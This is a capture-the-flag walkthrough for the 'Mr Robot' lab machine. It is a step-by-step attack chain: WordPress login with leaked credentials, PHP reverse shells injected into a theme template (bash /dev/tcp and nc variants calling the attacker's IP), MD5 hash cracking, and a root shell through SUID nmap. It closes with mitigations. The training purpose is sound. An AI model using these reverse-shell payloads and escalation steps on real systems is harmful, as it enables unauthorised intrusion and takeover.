Mr Robot CTF Walkthrough

Network Scanning

Objective: Discover open ports and running services on the target machine.

Start with a comprehensive Nmap scan:

nmap -sC -sV -oN initial_scan.txt <TARGET_IP>

The scan reveals the following ports:

• Port 22 (SSH): Closed
• Port 80 (HTTP): Closed (but actually filtered/accessible)
• Port 443 (HTTPS): Closed

Despite showing as closed, the web service is actually accessible. This can occur due to firewall rules or service configuration.

Key Learnings:

Nmap results can sometimes be misleading due to firewall configurations. Always test web services manually even if they appear closed in initial scans.

Directory Enumeration

Objective: Discover hidden directories and files using automated tools.

Use Gobuster to enumerate web directories:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Key discoveries include:

• /wp-content/ - WordPress content directory
• /wp-admin/ - WordPress admin panel
• /wp-login.php - WordPress login page
• /robots - Robots.txt file
• /license - License file with hidden content
• /readme - Readme file
• /0/ - Mysterious directory

Key Learnings:

The presence of WordPress-related directories indicates this is a WordPress site, which has known attack vectors and common vulnerabilities.

Information Gathering from Key Files

Objective: Extract valuable information from discovered files.

Robots.txt Analysis:

Navigate to http://<TARGET_IP>/robots to find:

User-agent: *
fsocity.dic
key-1-of-3.txt

Access the first key at http://<TARGET_IP>/key-1-of-3.txt:

License File Investigation:

Navigate to http://<TARGET_IP>/license and scroll down to find a Base64 encoded string:

ZWxsaW90OkVSMjgtMDY1Mgo=

Decode the Base64 string:

echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d

Result:

Key Learnings:

Always check robots.txt and license files for hidden information. Base64 encoding is commonly used to obfuscate credentials in CTF challenges.

WordPress Authentication

Objective: Gain access to the WordPress admin panel using discovered credentials.

Navigate to http://<TARGET_IP>/wp-login.php and log in with:

• Username: elliot
• Password: ER28-0652

Upon successful authentication, you'll have access to the WordPress admin dashboard with editor privileges.

Key Learnings:

WordPress admin access provides numerous attack vectors, including the ability to edit PHP files directly through the theme editor.

PHP Code Injection Preparation

Objective: Identify a suitable location for PHP reverse shell injection.

Navigate to Appearance → Editor in the WordPress admin panel. Look for PHP template files that can be edited, such as:

• 404.php (404 error template)
• index.php (main template)
• functions.php (theme functions)

The 404.php template is ideal because:

• It's easily accessible via invalid URLs
• Less likely to break the main site functionality
• Commonly targeted in WordPress exploitation

Key Learnings:

WordPress theme editor allows direct PHP code modification, making it a prime target for code injection attacks when admin access is compromised.

Netcat Listener Setup

Objective: Prepare to receive the reverse shell connection.

Set up a Netcat listener on your attacking machine:

nc -lvnp 4444

Explanation of flags:

• -l: Listen mode
• -v: Verbose output
• -n: Don't resolve hostnames
• -p 4444: Listen on port 4444

Key Learnings:

Always set up your listener before executing the reverse shell payload to avoid missing the connection.

PHP Reverse Shell Injection

Objective: Inject PHP code to establish a reverse shell connection.

Add the following PHP reverse shell code to the 404.php template (above existing PHP code):

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/[YOUR_IP]/4444 0>&1'");
?>

Replace [YOUR_IP] with your attacking machine's IP address.

Alternative PHP Reverse Shell:

<?php
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [YOUR_IP] 4444 >/tmp/f");
?>

Save the modified template file.

Key Learnings:

PHP's exec() and system() functions can execute system commands, making them powerful tools for establishing reverse shells.

Triggering the Reverse Shell

Objective: Execute the injected PHP code to establish the connection.

Navigate to a non-existent page to trigger the 404.php template:

http://<TARGET_IP>/404.php

Or try accessing any invalid URL:

http://<TARGET_IP>/nonexistent

Check your Netcat listener for the incoming connection. You should receive a shell as the daemon or www-data user.

Shell Improvement:

Upgrade to a more stable shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Key Learnings:

Reverse shells often provide limited functionality initially. Use Python's pty module to spawn a proper terminal for better interaction.

System Reconnaissance

Objective: Explore the system to find the second key and escalation paths.

Navigate to the home directory:

cd /home
ls -la

Discover the robot user directory:

cd /home/robot
ls -la

You'll find two files:

• key-2-of-3.txt - The second key (readable only by robot user)
• password.raw-md5 - MD5 hash of robot's password

Read the MD5 hash file:

cat password.raw-md5

Result: robot:c3fcd3d76192e4007dfb496cca67e13b

Key Learnings:

Look for password files, especially those containing hashes that can be cracked offline.

Hash Cracking

Objective: Crack the MD5 hash to obtain the robot user's password.

Use online hash cracking services like CrackStation or local tools:

Online Method:

1. Visit CrackStation.net
2. Enter hash: c3fcd3d76192e4007dfb496cca67e13b
3. Result: abcdefghijklmnopqrstuvwxyz

Local Method with John the Ripper:

echo "c3fcd3d76192e4007dfb496cca67e13b" > hash.txt
john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Key Learnings:

MD5 hashes of common passwords are easily cracked using rainbow tables and common wordlists. Always use strong, unique passwords and proper hashing algorithms.

User Privilege Escalation

Objective: Switch to the robot user and retrieve the second key.

Switch to the robot user:

su robot

Enter the cracked password: abcdefghijklmnopqrstuvwxyz

Read the second key:

cat key-2-of-3.txt

Key Learnings:

Lateral movement to different user accounts often provides access to additional files and escalation opportunities.

SUID Binary Discovery

Objective: Find SUID binaries that can be exploited for root access.

Search for SUID binaries:

find / -perm -4000 2>/dev/null

Notable results include:

/bin/umount
/bin/mount
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1

The key finding is /usr/local/bin/nmap with SUID permissions.

Key Learnings:

SUID binaries run with elevated privileges. Unusual binaries like nmap with SUID permissions often indicate privilege escalation opportunities.

Nmap Interactive Mode Exploitation

Objective: Exploit nmap's interactive mode to gain root shell access.

Older versions of nmap include an interactive mode that can spawn a shell. Execute:

/usr/local/bin/nmap --interactive

This drops you into nmap's interactive mode. From here, you can execute system commands:

nmap> !bash

Alternatively:

nmap> !sh

You should now have a root shell. Verify with:

whoami
id

Key Learnings:

Interactive modes in SUID binaries can often be exploited to execute arbitrary commands with elevated privileges. Check GTFOBins for known exploitation techniques.

Final Key Retrieval

Objective: Locate and retrieve the third and final key.

Search for the final key:

find / -name 'key-3-of-3.txt' 2>/dev/null

Result: /root/key-3-of-3.txt

Read the final key:

cat /root/key-3-of-3.txt

Additional Root Actions:

With root access, you can also:

• Read all user passwords: cat /etc/shadow
• Access SSH keys: ls -la /root/.ssh/
• View system logs: cat /var/log/auth.log
• Install persistence mechanisms

Key Learnings:

Root access provides complete control over the system. In real penetration tests, this would be the point to document findings and implement persistence if authorized.

Complete Attack Chain

Full Exploitation Path:

1. Reconnaissance: Directory enumeration revealed WordPress installation
2. Information Disclosure: robots.txt exposed first key and dictionary file
3. Credential Discovery: Base64 encoded credentials in license file
4. WordPress Compromise: Admin access through weak credentials
5. Code Injection: PHP reverse shell via theme editor
6. Lateral Movement: Hash cracking enabled user escalation
7. Privilege Escalation: SUID nmap exploitation for root access

All Three Keys:

Technical Skills Demonstrated:

• Network reconnaissance and service enumeration
• WordPress security testing and exploitation
• PHP code injection and reverse shell techniques
• Hash cracking and password analysis
• SUID binary exploitation
• Linux privilege escalation techniques
• System enumeration and file discovery

Vulnerabilities Identified:

• Information Disclosure: Sensitive data in publicly accessible files
• Weak Authentication: Predictable credentials
• WordPress Misconfigurations: Unrestricted theme editor access
• Weak Password Hashing: MD5 without salting
• SUID Misconfiguration: Unnecessary elevated privileges on nmap

Mitigation Recommendations:

• Remove sensitive information from public files
• Implement strong, unique passwords with proper hashing
• Disable WordPress file editing for admin users
• Regular security updates and patch management
• Audit SUID binaries and remove unnecessary permissions
• Implement proper access controls and principle of least privilege